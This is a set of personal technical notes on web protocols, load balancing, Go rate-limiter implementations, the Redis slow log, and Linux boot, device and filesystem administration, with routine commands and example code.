WebSocket communication consists of messages, and application code does not need to worry about buffering, parsing, and reconstructing received data. For example, if the server sends a 1 MB payload, the application’s onmessage callback will be called only once the client receives the entire payload.

WebSockets can transfer text or binary data.
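
For reference, here is a minimal echo server sketch in Go using the third-party github.com/gorilla/websocket package (an assumption of this example; the standard library does not ship a WebSocket implementation). The /echo path and port are placeholders.

package main

import (
	"log"
	"net/http"

	"github.com/gorilla/websocket"
)

var upgrader = websocket.Upgrader{} // default buffer sizes and origin policy

func echo(w http.ResponseWriter, r *http.Request) {
	// Upgrade performs the HTTP handshake that switches the connection to WebSocket.
	conn, err := upgrader.Upgrade(w, r, nil)
	if err != nil {
		log.Println("upgrade failed:", err)
		return
	}
	defer conn.Close()

	for {
		// Messages arrive whole; no manual buffering or reassembly is needed.
		msgType, msg, err := conn.ReadMessage()
		if err != nil {
			return
		}
		if err := conn.WriteMessage(msgType, msg); err != nil {
			return
		}
	}
}

func main() {
	http.HandleFunc("/echo", echo)
	log.Fatal(http.ListenAndServe(":8080", nil))
}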

HTTP

Directory Map

Clean URLs

Definition

Clean URLs, also known as user-friendly URLs, pretty URLs, search engine-friendly URLs, or RESTful URLs, are web addresses (Uniform Resource Locators or URLs) designed to enhance the usability and accessibility of websites, web applications, or web services. They aim to be immediately meaningful to non-expert users, reflect the logical structure of information, and decouple the user interface from the server’s internal representation.

Benefits

  • Improved usability and accessibility for users.
  • Enhanced search engine optimization (SEO).
  • Conformance with the representational state transfer (REST) architectural style.
  • Consistency in web resource locations, facilitating bookmarking.
  • Reduced difficulty in changing the resource implementation, as clean URLs don’t contain implementation details.
  • Improved security by concealing internal server or application information.

Structure

Clean URLs typically consist of a path that represents a logical structure that users can easily understand. They avoid including opaque or irrelevant information such as numeric identifiers, illegible data, or session IDs found in query strings.

Examples

  • Original URL: http://example.com/about.html Clean URL: http://example.com/about
  • Original URL: http://example.com/user.php?id=1 Clean URL: http://example.com/user/1
  • Original URL: http://example.com/index.php?page=name Clean URL: http://example.com/name
  • Original URL: http://example.com/kb/index.php?cat=1&id=23 Clean URL: http://example.com/kb/1/23
  • Original URL: http://en.wikipedia.org/w/index.php?title=Clean_URL Clean URL: http://en.wikipedia.org/wiki/Clean_URL

Implementation

The implementation of clean URLs involves URL mapping through pattern matching or transparent rewriting techniques on the server side. This ensures that users primarily interact with clean URLs.

For SEO, developers often include relevant keywords in clean URLs and remove unnecessary words, enhancing user-friendliness and search engine rankings.

Slug

A slug is the part of a URL that contains human-readable keywords identifying a page. It typically appears at the end of the URL and serves as the name of the resource. Slugs can be automatically generated from page titles or entered manually.

Characteristics of Slugs

  • Often entirely lowercase.
  • Accented characters replaced by Latin script letters.
  • Whitespace characters replaced by hyphens or underscores.
  • Punctuation marks removed.
  • Some common words (e.g., conjunctions) may be removed.

Slugs provide a brief idea of a page’s topic, help organize long lists of URLs, and make filenames more descriptive when saving web pages locally.

Websites using slugs include Stack Exchange Network and Instagram for question titles and user-specific URLs.
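
A rough Go sketch of those slug rules (lowercasing, hyphenating whitespace, dropping punctuation); accent folding is left out because it needs a transliteration table:

package main

import (
	"fmt"
	"strings"
	"unicode"
)

// slugify applies the common slug rules: lowercase, replace whitespace with
// hyphens, and drop punctuation. Accent folding is intentionally left out.
func slugify(title string) string {
	var b strings.Builder
	lastHyphen := false
	for _, r := range strings.ToLower(title) {
		switch {
		case unicode.IsLetter(r) || unicode.IsDigit(r):
			b.WriteRune(r)
			lastHyphen = false
		case unicode.IsSpace(r) && !lastHyphen:
			b.WriteRune('-')
			lastHyphen = true
		}
		// Everything else (punctuation marks) is dropped.
	}
	return strings.Trim(b.String(), "-")
}

func main() {
	fmt.Println(slugify("Clean URLs: Why They Matter!")) // clean-urls-why-they-matter
}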

HTTP Persistent Connection

HTTP persistent connection, also known as HTTP keep-alive or connection reuse, involves using a single TCP connection for multiple HTTP requests/responses instead of opening new connections for each pair. This method is employed in both HTTP/1.0 (unofficially through an extension) and HTTP/1.1 (officially, with all connections considered persistent unless specified otherwise). It offers several advantages, including reduced latency, CPU usage, network congestion, and enhanced HTTP pipelining. However, it can lead to resource allocation issues on the server if connections are not properly closed. Modern web browsers and Python’s requests library support HTTP persistent connections.

Overview

  • Definition: A method to use a single TCP connection for multiple HTTP requests/responses.
  • Also Known As: HTTP keep-alive, connection reuse.

Versions

  • HTTP/1.0: Unofficially implemented through an extension.
  • HTTP/1.1: Officially supports persistent connections as a default.

Advantages

  1. Reduced Latency: Fewer delays in communication.
  2. Lower CPU Usage: Less processing power required for connection setup and teardown.
  3. Decreased Network Congestion: Fewer connections lead to less network traffic.
  4. Enhanced HTTP Pipelining: Efficient request/response processing.

Disadvantages

  • Resource Allocation Issues: Potential server problems due to improperly closed connections.

Support

  • Modern Web Browsers: Generally support HTTP persistent connections.
  • Python’s requests Library: Also supports this feature.
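
Go’s net/http client behaves the same way: its default Transport keeps idle connections open and reuses them, as long as each response body is drained and closed. A small sketch (the URL is a placeholder):

package main

import (
	"fmt"
	"io"
	"net/http"
)

func main() {
	// http.Client reuses TCP connections (keep-alive) by default, provided
	// each response body is fully drained and closed.
	client := &http.Client{}

	for i := 0; i < 3; i++ {
		resp, err := client.Get("https://example.com/") // placeholder URL
		if err != nil {
			fmt.Println("request failed:", err)
			return
		}
		io.Copy(io.Discard, resp.Body) // drain so the connection can be reused
		resp.Body.Close()
		fmt.Println("request", i, "status:", resp.Status)
	}
}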

For more detailed information, visit the Wikipedia article.

URL vs. URI vs. URN

A URI identifies a resource; URLs and URNs are both kinds of URI. A URL locates a resource by scheme, host, and path (for example, https://rnemeth90.github.io/posts/2023-12-12-golang-url-validation/), while a URN names a resource within a namespace (for example, urn:isbn:0451450523) without specifying where to find it.


Load Balancing

Directory Map

load balancing

Static Algorithms

Round Robin

  • The client requests are sent to different service instances in sequential order. The services are usually required to be stateless.

Sticky Round Robin

  • This is an improvement of the round-robin algorithm. If Alice’s first request goes to service A, the following requests go to service A as well.

Weighted round-robin

  • The admin can specify the weight for each service. The ones with a higher weight handle more requests than others.

Hash

  • This algorithm applies a hash function on the incoming requests’ IP or URL. The requests are routed to relevant instances based on the hash function result. We can use other attributes for hashing algorithms. For example, HTTP header, request type, client type, etc.
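
A minimal Go sketch of the hash approach, mapping the client IP onto a backend so the same client consistently reaches the same instance (the backend addresses are made up):

package main

import (
	"fmt"
	"hash/fnv"
)

// backends is a hypothetical list of service instances.
var backends = []string{"10.0.0.1:8080", "10.0.0.2:8080", "10.0.0.3:8080"}

// pickBackend hashes a request attribute (here the client IP) and maps it
// onto a backend, so the same client keeps landing on the same instance.
func pickBackend(clientIP string) string {
	h := fnv.New32a()
	h.Write([]byte(clientIP))
	return backends[h.Sum32()%uint32(len(backends))]
}

func main() {
	for _, ip := range []string{"203.0.113.7", "198.51.100.23", "203.0.113.7"} {
		fmt.Println(ip, "->", pickBackend(ip))
	}
}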

Dynamic Algorithms

Least connections

  • A new request is sent to the service instance with the least concurrent connections.
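
A rough Go sketch of the selection step; in a real balancer the connection counts would be tracked as connections open and close, but here they are hard-coded for illustration:

package main

import "fmt"

// backend pairs a (made-up) address with its current number of active connections.
type backend struct {
	addr        string
	activeConns int
}

// leastConnections returns the backend currently handling the fewest connections.
func leastConnections(pool []backend) backend {
	best := pool[0]
	for _, b := range pool[1:] {
		if b.activeConns < best.activeConns {
			best = b
		}
	}
	return best
}

func main() {
	pool := []backend{
		{"10.0.0.1:8080", 12},
		{"10.0.0.2:8080", 3},
		{"10.0.0.3:8080", 7},
	}
	fmt.Println("route to:", leastConnections(pool).addr)
}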

Least response time

  • A new request is sent to the service instance with the fastest response time.

Nginx

Directory Map

set header

    nginx.ingress.kubernetes.io/server-snippet: |
        if ($upstream_status == 404){
            #set header
            add_header x-aprimo-upstream-status "my server header content!";
        }

Rate Limiting Algorithms

Directory Map

Fixed Window Counter Algorithm

The algorithm divides a timeline into fixed-size windows and assigns a counter to each window. Each request increments the counter by 1. Once the counter reaches the pre-defined threshold, future requests are dropped until a new time window starts.
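
A minimal in-memory Go sketch of the idea, in the same style as the bucket examples below; the limit and window length are arbitrary:

package main

import (
	"fmt"
	"sync"
	"time"
)

// FixedWindowCounter allows at most `limit` requests per fixed window.
type FixedWindowCounter struct {
	limit       int
	window      time.Duration
	count       int
	windowStart time.Time
	mu          sync.Mutex
}

func NewFixedWindowCounter(limit int, window time.Duration) *FixedWindowCounter {
	return &FixedWindowCounter{limit: limit, window: window, windowStart: time.Now()}
}

// Allow resets the counter when a new window starts, then reports whether
// the current request is still under the threshold.
func (f *FixedWindowCounter) Allow() bool {
	f.mu.Lock()
	defer f.mu.Unlock()

	now := time.Now()
	if now.Sub(f.windowStart) >= f.window {
		f.windowStart = now
		f.count = 0
	}
	if f.count >= f.limit {
		return false
	}
	f.count++
	return true
}

func main() {
	limiter := NewFixedWindowCounter(5, time.Second)
	for i := 0; i < 8; i++ {
		fmt.Println("request", i, "allowed:", limiter.Allow())
	}
}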

Leaking Bucket Algorithm

Similar to a token bucket except that requests are processed at a fixed rate. It is usually implemented with a queue (FIFO).

When a request arrives, the system checks if the queue is full. If it is not full, the request is added to the queue. Otherwise, the request is dropped. Requests are pulled from the queue and processed at regular intervals.

The Leaking Bucket algorithm takes two parameters: bucket size (usually equal to the queue size) and outflow rate (how many requests can be processed per second).

package main

import (
	"sync"
	"time"
)

type LeakyBucket struct {
	capacity    int64
	remaining   int64
	leakRate    time.Duration
	lastLeak    time.Time
	mu          sync.Mutex
}

func NewLeakyBucket(capacity int64, leakRate time.Duration) *LeakyBucket {
	return &LeakyBucket{
		capacity:  capacity,
		remaining: capacity,
		leakRate:  leakRate,
		lastLeak:  time.Now(),
	}
}

func (b *LeakyBucket) TryTake(n int64) bool {
	b.mu.Lock()
	defer b.mu.Unlock()

	// Calculate the time since the last leak
	now := time.Now()
	leaked := int64(now.Sub(b.lastLeak) / b.leakRate)

	// Update the bucket's current state
	if leaked > 0 {
		// Refill available capacity based on elapsed time, capped at the bucket size.
		if b.remaining+leaked >= b.capacity {
			b.remaining = b.capacity
		} else {
			b.remaining += leaked
		}
		b.lastLeak = now
	}

	// Try to take n from the bucket
	if n > b.remaining {
		return false
	}
	b.remaining -= n
	return true
}

func main() {
	bucket := NewLeakyBucket(10, time.Second)
	for {
		if bucket.TryTake(1) {
			println("Took 1 from the bucket")
		} else {
			println("Bucket is empty, waiting...")
		}
		time.Sleep(100 * time.Millisecond)
	}
}

Token Bucket Algorithm

The token bucket rate limiting algorithm is a popular method for rate limiting, used by companies like Amazon and Stripe.

A token bucket is a container that has a pre-defined capacity. Tokens are put in the bucket at preset rates periodically. Once the bucket is full, no more tokens are added. Each request consumes one token. When a request arrives, we first check if there are available tokens in the bucket. If there are no tokens available, the request is denied.

The token bucket algorithm takes two parameters: bucket size (the number of tokens the bucket can store) and refill rate (the number of tokens put into the bucket every second).

Example:

package main

import (
	"fmt"
	"sync"
	"time"
)

// TokenBucket represents a token bucket rate limiter
type TokenBucket struct {
	tokens           int
	capacity         int
	tokenRate        time.Duration
	lastRefill       time.Time
	mu               sync.Mutex
}

// NewTokenBucket creates a new token bucket
func NewTokenBucket(capacity int, refillRate time.Duration) *TokenBucket {
	return &TokenBucket{
		tokens:           capacity,
		capacity:         capacity,
		tokenRate:        refillRate,
		lastRefill:       time.Now(),
	}
}

// refill refills tokens in the bucket based on the elapsed time since the last refill
func (tb *TokenBucket) refill() {
	now := time.Now()
	elapsed := now.Sub(tb.lastRefill)
	tokensToAdd := int(elapsed / tb.tokenRate)
	if tokensToAdd > 0 {
		tb.tokens = min(tb.capacity, tb.tokens+tokensToAdd)
		tb.lastRefill = now
	}
}

// Consume consumes a token from the bucket if available
func (tb *TokenBucket) Consume() bool {
	tb.mu.Lock()
	defer tb.mu.Unlock()

	tb.refill()
	if tb.tokens > 0 {
		tb.tokens--
		return true
	}
	return false
}

func min(a, b int) int {
	if a < b {
		return a
	}
	return b
}

func main() {
	tb := NewTokenBucket(10, time.Second)  // Capacity of 10 tokens, and refills 1 token every second

	// Simulating rapid requests
	for i := 0; i < 15; i++ {
		if tb.Consume() {
			fmt.Println("Request", i, "allowed")
		} else {
			fmt.Println("Request", i, "denied")
		}
		time.Sleep(500 * time.Millisecond)
	}
}

Redis

Directory Map

redis

redis_architecture

Slowlog

https://redis.io/commands/slowlog-get/

… The SLOWLOG GET command returns entries from the slow log in chronological order

The Redis Slow Log is a system to log queries that exceeded a specified execution time. The execution time does not include I/O operations like talking with the client, sending the reply and so forth, but just the time needed to actually execute the command (this is the only stage of command execution where the thread is blocked and can not serve other requests in the meantime).

A new entry is added to the slow log whenever a command exceeds the execution time threshold defined by the slowlog-log-slower-than configuration directive. The maximum number of entries in the slow log is governed by the slowlog-max-len configuration directive.

By default the command returns the latest ten entries in the log. The optional count argument limits the number of returned entries, so the command returns at most up to count entries; the special number -1 means return all entries.

Each entry from the slow log is comprised of the following six values:

  1. A unique progressive identifier for every slow log entry.
  2. The unix timestamp at which the logged command was processed.
  3. The amount of time needed for its execution, in microseconds.
  4. The array composing the arguments of the command.
  5. Client IP address and port.
  6. Client name if set via the CLIENT SETNAME command.

The entry’s unique ID can be used in order to avoid processing slow log entries multiple times (for instance you may have a script sending you an email alert for every new slow log entry). The ID is never reset in the course of the Redis server execution, only a server restart will reset it.

SLOWLOG GET [count]

Systems

Notes on Linux systems administration, kernel internals, and system-level concepts.

Core Topics

System Fundamentals

System Services and Configuration

Development and Tools

System Internals

Observability and Troubleshooting

Subdirectories

Bash

Shell scripting and bash-specific notes

Commands

Detailed documentation for specific Linux commands

Greybeard Qualification

Advanced Linux system administration topics

Linux Kernel Boot Process

High Level Process:

  1. The machine’s BIOS or UEFI loads and runs a boot loader
  2. The boot loader finds the kernel image on disk, loads it into memory, and starts it.
  3. The kernel takes over and initializes the devices and drivers for each. This happens in the following order:
    1. CPU inspection
    2. memory inspection
    3. device bus discovery
    4. device discovery
    5. Auxiliary kernel subsystem setup (networking, etc.)
  4. The kernel mounts the root filesystem
  5. The kernel starts a program called init (systemd) with a PID of 1. This point is the user-space startup.
  6. init sets the rest of the system processes in motion
  7. At some point, init starts a process allowing you to log in, usually at or near the end of the boot sequence.

The best way to view the boot process diagnostic logs is with journalctl. You can use journalctl -k to view messages from the current boot. You can use the -b option to view messages from previous boots. You can also check for a log file such as /var/log/kern.log or run the dmesg command to view the messages in the kernel ring buffer.

Kernel parameters

When the Linux kernel starts, it receives a list of text parameters containing a few additional system details. The parameters specify many different types of behavior, such as the amount of diagnostic output the kernel should produce and device driver-specific options.

  • You can view the parameters passed to the kernel by looking at the /proc/cmdline file:
    root@nginx-vm-00:~# cat /proc/cmdline
    BOOT_IMAGE=/boot/vmlinuz-5.15.0-1029-azure root=PARTUUID=c51187ab-04cc-499f-8947-0211dc8d74e7 ro console=tty1 console=ttyS0 earlyprintk=ttyS0 panic=-1
    
    Upon encountering a parameter that the kernel does not understand, the kernel passes that parameter to the init system. For example, if you were to pass the -s parameter to the kernel, the kernel would pass that parameter to systemd to boot the system into single-user mode. Read the bootparam(7) man page for more info on kernel boot parameters.

Boot Loaders

  • At the start of the boot process, a boot loader starts the kernel. It loads the kernel into memory from somewhere on disk, and then starts the kernel with a set of kernel parameters as described above. This process sounds simple, right? Well, it gets a bit more complicated. Some questions need to be answered: “where is the kernel?” and “what boot parameters do we use?”. It seems like these answers should be easy to find. But remember, the kernel is not yet running, and it’s the kernel’s job to traverse a file system to locate files. We have a ‘chicken and egg’ problem.
  • A boot loader does need a driver to access a disk. On PCs, the boot loader uses the BIOS or UEFI to access disks. Disk hardware typically includes firmware that allows the BIOS or UEFI to access attached storage hardware via Logical Block Addressing (LBA). LBA is a universal, simple way to access data from any disk.
  • To determine if your system uses BIOS or UEFI, you can run efibootmgr. If you get a list of boot devices, your system is using UEFI. If you get an error stating UEFI parameters are not supported, your system is using BIOS. Alternatively, if /sys/firmware/efi exists, your system is using UEFI.
  • Boot loaders typically allow users to switch between different kernels and operating systems.
  • Common Boot Loaders
    • GRUB = Used on most linux systems. Supports BIOS and UEFI
    • LILO = One of the first boot loaders available for linux.
    • SYSLINUX
    • systemd-boot
    • coreboot
  • Accessing the boot loader may be different on each system. Linux distributions tend to heavily modify the boot loader, causing some confusion. On a PC, you can typically hold down shift or esc to access the boot loader shortly after powering on the system.
  • To generate a grub configuration file:
    • grub2-mkconfig -o /boot/grub2/grub.cfg for BIOS systems
    • grub2-mkconfig -o /boot/efi/EFI/grub.cfg for EFI systems
    • grub2-install can be used to install grub on a disk
    • The boot loader is typically stored on the first few sectors of a disk
    • The grub2.cfg file is typically stored at /boot/grub2/grub.cfg for BIOS systems
  • /etc/default/grub is used by the grub2-mkconfig utility to determine what settings to use when it generates the grub.cfg file. After you modify this file, you need to run grub2-mkconfig to actually regenerate the grub2 config
    GRUB_TIMEOUT=1
    GRUB_TIMEOUT_STYLE=countdown
    GRUB_DISTRIBUTOR="$(sed 's, release .*$,,g' /etc/system-release)"
    GRUB_DEFAULT=saved
    GRUB_DISABLE_SUBMENU=true
    GRUB_TERMINAL="serial console"
    GRUB_CMDLINE_LINUX="console=tty1 console=ttyS0,115200n8 earlyprintk=ttyS0,115200 rootdelay=300 scsi_mod.use_blk_mq=y crashkernel=auto"
    GRUB_DISABLE_RECOVERY="true"
    GRUB_ENABLE_BLSCFG=true
    GRUB_SERIAL_COMMAND="serial --speed=115200 --unit=0 --word=8 --parity=no --stop=1"
    
  • Install, Configure, and Troubleshoot BootLoaders
    • To regenerate grub2 config:
      • Boot into recovery media, then:
        • chroot /mnt/sysroot
        • To regenerate grub config for BIOS system
          • grub2-mkconfig -o /boot/grub2/grub.cfg
        • To regenerate grub config for EFI system:
          • grub2-mkconfig -o /boot/efi/EFI/centos/grub.cfg
    • To reinstall the boot loader:
      • BIOS systems:
        • Use lsblk to look at block devices. Try to identify the boot device
        • Use grub2-install /dev/sda to install grub to the boot device
      • EFI Systems:
        • Use dnf reinstall grub2-efi grub2-efi-modules shim to reinstall grub to the boot device

Grub

  • The grub configuration directory is usually /boot/grub or /boot/grub2 (grub2 on redhat distros)
  • The main configuration file for grub is grub.cfg. Do not modify this file directly, instead use grub-mkconfig. The files in /etc/grub.d are shell scripts that make up the grub.cfg. When you call grub-mkconfig, it references these scripts in /etc/grub.d to create the grub.cfg. To modify the grub configuration, simply add another script to this directory. Then call grub-mkconfig, overwriting the /boot/grub/grub.cfg file: grub-mkconfig -o /boot/grub/grub.cfg
  • To (re)install grub, you can use grub-install
    • Example for installing grub on a mounted storage device: grub-install --boot-directory=/mnt/boot /dev/sdc

User space init

Process overview:

  1. init system starts (typically systemd)
  2. Essential low-level services start (think udevd and syslogd)
  3. Network services start
  4. Mid and high-level services start (cron, printing, etc.)
  5. Login prompts, GUIs, and high-level apps, such as web servers start

Shutting down the system

  • You can use sudo systemctl reboot --force to force a system to reboot
  • only the superuser can reboot
  • shutdown takes a time parameter for scheduling a shutdown.
    • ex: shutdown 03:00 = shutdown at 3AM
    • shutdown +15 shutdown in 15 minutes
    • If you specify a time in the future, the shutdown command creates a file called /etc/nologin and no one but the superuser is able to log in to the system.
    • When the shutdown time arrives, shutdown tells the init system to begin the shutdown process. On a system using systemd, this means activating the shutdown units.
  • If you halt the system, it shuts the machine down immediately. To do this, run: shutdown -h now or halt
    • On most versions of Linux, a halt cuts power to the system. This can be unforgiving, as it does not give disk buffers time to sync (potentially causing corrupt data).
  • The shutdown process:
    1. init asks every process to shut down cleanly
    2. If a process doesn’t respond after a while, init kills it, first trying a TERM signal
    3. If the TERM signal doesn’t work, init uses the KILL signal
    4. The system locks system files to prevent modification
    5. The system unmounts all filesystems other than root
    6. The system remounts root as read-only
    7. The final step is to call the kernel to reboot or stop with the reboot(2) system call

Initramfs

  • We need the initramfs because the kernel does not talk directly to the PC BIOS or EFI to get data from disks. So in order to mount its root filesystem, it needs driver support for the underlying storage. There are so many storage controllers that having a driver for each one in the kernel is not feasible. Therefore, these drivers are shipped as loadable modules. These modules exist on disk, so we have a chicken and egg scenario. How can the kernel load these drivers from disk if it cannot read the disk because it doesn’t currently have these drivers loaded?
  • The workaround is to gather these drivers along with a few other utilities into a cpio archive. The boot loader loads this archive into memory before running the kernel. Upon start, the kernel reads the contents of the archive into a temp file system in RAM known as the initramfs, mounts it at /, and performs the user-mode handoff to the init on the initramfs. Then, the utilities included in the initramfs allow the kernel to load the necessary driver modules for the real root filesystem. Finally, the utilities mount the real root filesystem and start the init system.

Common Files and Directories

Most system configuration files on a Linux system are found in /etc

Dev Tools

GCC (c compiler)

The c compiler on most Unix systems is the GNU C Compiler (gcc).

Here is a classic program written in c:

#include <stdio.h>

int main(){
  printf("Hello, World!\n");
}

You can compile it by saving it in a file ending with a .c extension, and then running:

cc -o hello hello.c

Shared Libraries

Shared libraries have a .so extension (shared object)

You can see what shared libraries a program uses by running ldd:

ryan:notes/  |main ?:1 ✗|$ ldd /bin/bash
        linux-vdso.so.1 (0x00007fff758ab000)
        libtinfo.so.6 => /lib/x86_64-linux-gnu/libtinfo.so.6 (0x00007fae9d281000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fae9d059000)
        /lib64/ld-linux-x86-64.so.2 (0x00007fae9d429000)

devices

  • The udev service enables user space programs to automatically configure and use new devices.
  • The kernel presents many IO interfaces for devices as files to user space processes
  • device files are in the /dev directory
  • to identify a device and view its properties, use ls -l. Note the first character of each line in the output below. If you see b (block), c (character), p (pipe), or s (socket), the file is a device.
    • ryan:notes/  |main ✓|$ ls -l /dev | head
      total 0
      crw-------   1 root root       10,   107 Jan  6 15:14 acpi_thermal_rel
      crw-r--r--   1 root root       10,   235 Jan  6 15:14 autofs
      drwxr-xr-x   2 root root             260 Jan  6 15:14 block/
      crw-rw----   1 root disk       10,   234 Jan  6 15:14 btrfs-control
      drwxr-xr-x   3 root root              60 Jan  6 15:14 bus/
      drwxr-xr-x   2 root root            5960 Jan  7 08:29 char/
      crw--w----   1 root tty         5,     1 Jan  6 15:14 console
      lrwxrwxrwx   1 root root              11 Jan  6 15:14 core -> /proc/kcore
      drwxr-xr-x  10 root root             220 Jan  6 15:14 cpu/
      

device types

  • block device = hard disks. Data is read in chunks
  • character device = data is read in streams (monitors, printers, etc.)
  • pipes = like character devices, except another process is at the end of the IO stream
  • socket = special purpose interfaces that are typically used for inter-process communications

sysfs

  • The sysfs filesystem is a pseudo-filesystem which provides an interface to kernel data structures.
  • The sysfs filesystem is commonly mounted at /sys.
  • Many of the files in the sysfs filesystem are read-only, but some files are writable, allowing kernel variables to be changed. To avoid redundancy, symbolic links are heavily used to connect entries across the filesystem tree.
ryan:~/ $ ll /sys/
total 4
   1 0 dr-xr-xr-x  13 root root    0 Jan  6 15:14 ./
   2 4 drwxr-xr-x  20 root root 4096 Dec 27 19:39 ../
8359 0 drwxr-xr-x   2 root root    0 Jan  6 15:14 block/
   8 0 drwxr-xr-x  54 root root    0 Jan  6 15:14 bus/
  10 0 drwxr-xr-x  87 root root    0 Jan  6 15:14 class/
   5 0 drwxr-xr-x   4 root root    0 Jan  6 15:14 dev/
   4 0 drwxr-xr-x  29 root root    0 Jan  6 15:14 devices/
  11 0 drwxr-xr-x   6 root root    0 Jan  6 15:14 firmware/
   2 0 drwxr-xr-x  10 root root    0 Jan  6 15:14 fs/
  12 0 drwxr-xr-x   2 root root    0 Jan  6 15:14 hypervisor/
5235 0 drwxr-xr-x  17 root root    0 Jan  6 15:14 kernel/
6394 0 drwxr-xr-x 349 root root    0 Jan  6 15:14 module/
5247 0 drwxr-xr-x   3 root root    0 Jan  6 15:14 power/

  • The most important directories within /sys are:
    • block = contains info for every block device attached to the system
    • bus = contains a directory for every bus type in the kernel
    • hypervisor =
    • class
    • devices
    • kernel
    • firmware
    • module
    • power

https://docs.kernel.org/filesystems/sysfs.html https://www.kernel.org/doc/Documentation/filesystems/sysfs.txt

Hard Disks

  • Most block devices attached to a Linux system will have a device name with a prefix of /dev/sd*

    • Example: /dev/sda
    • The ‘sd’ portion stands for SCSI Disk
  • To list the SCSI devices on your system, use a tool that walks the SCSI device paths, such as lsscsi

    • lsscsi is not commonly installed by default

udevd

  • udevd is responsible for creating device files for attached devices
  • The process is commonly systemd-udevd
  • The kernel will send a notification to this process upon detecting a new device attached to the system. Udevd will then create a file in user-land for the device.
    • This caused problems because some devices need to be available very early in the boot process, so devtmpfs was created
    • The devtmpfs filesystem is used by the kernel to create device files as necessary, but it also notifies udevd that a new device is available. Upon receiving this signal, udevd does not create a new device file, but it does perform device initialization along with setting permissions and notifying other processes that new devices are available.

Disks

  • Modern disks include an on-disk queue for I/O requests. I/O accepted by the disk may either be waiting on the queue or served. While this may imply a first-come, first-served queue, the on-disk controller can apply other algorithms to optimize performance. These algorithms include elevator seeking for rotational disks or separate queues for read and write I/O (especially for flash disks).

Caching

The on-disk cache may also be used to increase write performance, by using it as a write-back cache. This signals writes as having completed after the data transfer to cache and before the slower transfer to persistent storage. The counter-term is the write-through cache, which completes writes only after the full transfer to the next level. Storage write-back caches are often coupled with batteries, in case of power failure.

The best caching is no caching at all.

At the disk device driver level and below, caches may include the following:

  • Device Cache
  • Block Cache
  • Disk Controller Cache
  • Storage Array Cache
  • On-disk Cache

Measuring Time

Storage time can be measured as:

  • I/O request time: the entire time from issuing the I/O to its completion
  • I/O Wait time: The time spent waiting in a queue
  • I/O service time: The time during which the I/O was processing

file systems

  • A file system is like a database. It defines the structure to transform a simple block device into a sophisticated hierarchy of files and directories that users can understand.
  • File systems are typically implemented in the kernel. However, 9P from Plan 9 has inspired the development of user-space file systems. The FUSE (Filesystem in Userspace) feature allows file systems to be created in user space.
  • The following list shows the most common file systems in use today:
    • ext4 (extended file system, v4)
      • Supports journaling (a small cache outside of the file system) to provide data integrity and hasten booting (introduced with ext3)
      • The ext4 file system is an incremental improvement over ext2/3 and provides support for larger files and a greater number of directories.
    • btrfs (b-tree filesystem)
      • a newer file system native to linux, designed to scale beyond the limitations of ext4
    • FAT (file allocation table)
      • 3 types: msdos, vfat, exfat
      • Used by most removable flash media
      • Supported by Windows, Darwin, and Linux
    • XFS
      • A high performance filesystem used by default on some Linux distros, such as RHEL
    • HFS+
      • An Apple standard filesystem used on Mac systems
    • ISO 9660
      • Used on CD-ROM discs

Directories

  • Directories in Linux (ext file systems) are just a file containing a table with two columns: the name and the inode number of each file within the directory.

inodes

  • A traditional *nix file system has two primary components: a pool of data blocks where you can store data and a database system that manages that data pool. The database system is centered around the inode data structure. An inode is metadata about a file. Inodes are identified by numbers in an inode table. File names and directories are implemented as inodes.
  • A directory inode contains a list of filenames and links corresponding to other inodes.
  • To view the inode numbers for any directory, use ls -i or stat <filename>
  • 3 time stamps:
    • atime: last time the file was open()
    • mtime: last time the file was modified
    • ctime: ctime IS NOT creation time. It is the last time the inode was changed. For example, using chown or chmod will change the ctime.
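
On a 64-bit Linux system you can read these inode fields from Go through the syscall-level stat structure; a quick sketch (the path is just a placeholder):

package main

import (
	"fmt"
	"os"
	"syscall"
	"time"
)

func main() {
	info, err := os.Stat("/etc/hostname") // placeholder path
	if err != nil {
		fmt.Println(err)
		return
	}

	// On Linux, the underlying stat data exposes the inode number and timestamps.
	st := info.Sys().(*syscall.Stat_t)
	fmt.Println("inode:", st.Ino)
	fmt.Println("atime:", time.Unix(st.Atim.Sec, st.Atim.Nsec))
	fmt.Println("mtime:", time.Unix(st.Mtim.Sec, st.Mtim.Nsec))
	fmt.Println("ctime:", time.Unix(st.Ctim.Sec, st.Ctim.Nsec))
}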

Format a partition with a file system

  • When preparing new storage devices, after partitioning the device, you are ready to create a file system
    • You can use mkfs to create a file system on a partition. mkfs has several aliases for each file system type. Example: mkfs.ext4, mkfs.xfs, etc.
    • mkfs will automatically detect the number of blocks on the device and set some reasonable defaults based on this. Unless you really understand what you are doing, do not change these defaults.

Mounting a file system

  • After creating a file system on a partition, you can mount it using the mount command
    • Usage: mount -t *type* *device* *mountpoint*
    • Example: mount -t ext4 /dev/sda2 /mnt/mydisk
    • To unmount a file system, use umount
      • Example: umount /mnt/mydisk
    • It is recommended to mount a file system by its UUID, rather than its name. Device names are determined by the order in which the kernel finds the device and can change over time.
      • You can use blkid or lsblk -f to identify the UUID of a partition
      • You can then mount using the UUID by:
        • mount UUID=<insert UUID here> /mnt/mydisk

The number of options available for the mount command is staggering. You should review the man page for more info

Buffering/Cache/Caching

  • Linux, like other Unix variants, buffers writes to the disk. This means that the kernel doesn’t immediately write changes to the disk. Instead, it writes the changes to a buffer in RAM and later writes them to the disk when it deems appropriate.
  • When you unmount a file system with umount, its changes are automatically written to the disk from the buffer (which is why you should always unmount partitions before removing them from the system, e.g. USB drives). However, you can also force this to happen using the sync command.
  • The kernel also uses a cache to store reads from the disk. This way, if a process continually reads the same data from the disk, it doesn’t have to go to the disk every time to fetch the data, rather using the cache to read the data from.

Automatically mounting filesystems at boot time

  • The /etc/fstab file is used to automatically mount filesystems at boot time
  • There are two alternatives to /etc/fstab
    • /etc/fstab.d/ directory. This directory can contain individual filesystem configuration files (one for each filesystem).
    • Systemd unit files.

Filesystem Utilization

  • To view the utilization of your currently mounted filesystems, you can use the df command.
    • Pass the -h flag to view free space in a human readable form
      • Example: df -h

Checking and Repairing Filesystems

  • Filesystem errors are usually due to a user shutting down a system in a wrong way (like pulling the power cable). Such situations could leave the filesystem cache in memory not matching the data on the disk. This is especially bad if the system is in the process of modifying the filesystem when you give it a kick. Many filesystems support journaling (ext3+ filesystems for example), but you should always shut down a system properly.
  • The tool to check a filesystem for errors is fsck. There is a different version of fsck for each filesystem that linux supports. For example, the ext filesystems will use e2fsck to check the filesystem for errors. However, you don’t need to run e2fsck directly. You can just run fsck and it will usually detect the filesystems and run the appropriate repair tool.
